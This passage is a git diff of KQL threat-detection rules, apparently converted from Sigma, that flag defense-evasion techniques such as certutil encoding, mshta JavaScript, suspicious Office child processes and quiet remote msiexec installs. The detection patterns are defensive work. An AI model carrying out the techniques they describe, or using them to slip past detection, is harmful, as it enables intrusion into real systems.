 | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
index 24a29b1e..4d442bf7 100644
--- a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
+++ b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Files in Default GPO Folder
-// Author: elhoim
-// Date: 2022-04-28
-// Level: medium
-// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1036.005, attack.defense-evasion
-
-DeviceFileEvents
+// Title: Suspicious Files in Default GPO Folder
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036.005, attack.defense-evasion
+
+DeviceFileEvents
 | where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
index 3947f385..3f6ef8ad 100644
--- a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious HH.EXE Execution
-// Author: Maxim Pavlunin
-// Date: 2020-04-01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-
-DeviceProcessEvents
+// Title: Suspicious HH.EXE Execution
+// Author: Maxim Pavlunin
+// Date: 2020-04-01
+// Level: high
+// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
index affa996f..3ba59dad 100644
--- a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
+++ b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious High IntegrityLevel Conhost Legacy Option
-// Author: frack113
-// Date: 2022-12-09
-// Level: informational
-// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-// False Positives:
-// - Very Likely, including launching cmd.exe via Run As Administrator
-
-DeviceProcessEvents
+// Title: Suspicious High IntegrityLevel Conhost Legacy Option
+// Author: frack113
+// Date: 2022-12-09
+// Level: informational
+// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Very Likely, including launching cmd.exe via Run As Administrator
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
index 550eac24..279b5fc7 100644
--- a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
+++ b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-22
-// Level: medium
-// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate usage of appcmd to add new URL rewrite rules
-
-DeviceProcessEvents
+// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of appcmd to add new URL rewrite rules
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql
index 3fa20937..c61b1951 100644
--- a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious JavaScript Execution Via Mshta.EXE
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: high
-// Description: Detects execution of javascript code using "mshta.exe".
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.005
-
-DeviceProcessEvents
+// Title: Suspicious JavaScript Execution Via Mshta.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects execution of javascript code using "mshta.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
index 1bdd6395..ac7926f6 100644
--- a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
+++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious LNK Double Extension File Created
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022-11-07
-// Level: medium
-// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.007
-// False Positives:
-// - Some tuning is required for other general purpose directories of third party apps
-
-DeviceFileEvents
+// Title: Suspicious LNK Double Extension File Created
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-11-07
+// Level: medium
+// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+// - Some tuning is required for other general purpose directories of third party apps
+
+DeviceFileEvents
 | where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." 
or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
index c7d27d6a..168bfa13 100644
--- a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Microsoft Office Child Process
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018-04-06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-
-DeviceProcessEvents
+// Title: Suspicious Microsoft Office Child Process
+// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
+// Date: 2018-04-06
+// Level: high
+// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", 
"odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains 
"\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql
index 3cd23e51..1b4c62a9 100644
--- a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Msbuild Execution By Uncommon Parent Process
-// Author: frack113
-// Date: 2022-11-17
-// Level: medium
-// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Msbuild Execution By Uncommon Parent Process
+// Author: frack113
+// Date: 2022-11-17
+// Level: medium
+// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
index 14601d2d..342a5044 100644
--- a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious MSDT Parent Process
-// Author: Nextron Systems
-// Date: 2022-06-01
-// Level: high
-// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1218
-
-DeviceProcessEvents
+// Title: Suspicious MSDT Parent Process
+// Author: Nextron Systems
+// Date: 2022-06-01
+// Level: high
+// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
index 15cd1ac7..7c4b4a5b 100644
--- a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious MSHTA Child Process
-// Author: Michael Haag
-// Date: 2019-01-16
-// Level: high
-// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
-// False Positives:
-// - Printer software / driver installations
-// - HP software
-
-DeviceProcessEvents
+// Title: Suspicious MSHTA Child Process
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
+// False Positives:
+// - Printer software / driver installations
+// - HP software
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
index e645f938..0a793859 100644
--- a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious MsiExec Embedding Parent
-// Author: frack113
-// Date: 2022-04-16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1218.007, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious MsiExec Embedding Parent
+// Author: frack113
+// Date: 2022-04-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.007, attack.defense-evasion
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
index c104c74f..0d13b60e 100644
--- a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Msiexec Execute Arbitrary DLL
-// Author: frack113
-// Date: 2022-01-16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.007
-// False Positives:
-// - Legitimate script
-
-DeviceProcessEvents
+// Title: Suspicious Msiexec Execute Arbitrary DLL
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql
index 03997270..4e2b3576 100644
--- a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Msiexec Quiet Install From Remote Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-28
-// Level: medium
-// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.007
-
-DeviceProcessEvents
+// Title: Suspicious Msiexec Quiet Install From Remote Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: medium
+// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql
index e0654e90..4fe0bd62 100644
--- a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql
+++ b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Network Connection Binary No CommandLine
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-03
-// Level: high
-// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceNetworkEvents
+// Title: Suspicious Network Connection Binary No CommandLine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceNetworkEvents
 | where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
index 5e6427e8..7783b72a 100644
--- a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
+++ b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Obfuscated PowerShell Code
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-11
-// Level: high
-// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Obfuscated PowerShell Code
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-11
+// Level: high
+// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
